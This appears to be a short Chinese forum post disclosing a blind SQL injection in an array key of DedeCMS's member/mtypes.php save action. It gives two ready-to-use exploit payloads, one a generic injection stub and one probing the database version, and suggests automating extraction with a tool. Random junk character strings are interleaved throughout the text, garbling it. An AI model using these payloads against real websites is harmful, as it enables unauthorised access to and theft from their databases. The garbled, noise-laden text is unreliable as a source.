需要magic_quotes_gpc = Off,所以说是鸡肋啊.
- O" n$ F" f7 _1 S( h. J' d& D6 e! g$ M+ P+ V
( q- N3 M6 h/ c3 h8 s0 X5 y( `发生在数组key里的注射漏洞,有点意思.. z" \( g4 F4 F1 `' j
4 |& A9 _& g5 I
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
( y4 A1 V" Z+ _" s9 N- T
" H v( I2 o& `5 w, g$ U1 rhttp://www.xxx.com /dede/member/mtypes.php?dopost=save [& I: T- A$ V: L- C" F {3 c
7 k: U5 a- ?+ Q- f5 x0 B' Vexploit:
' k7 C5 s- y& x+ Rmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
i7 G8 Q. w! n- e. b. b. Nmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
0 L7 S y5 p% P |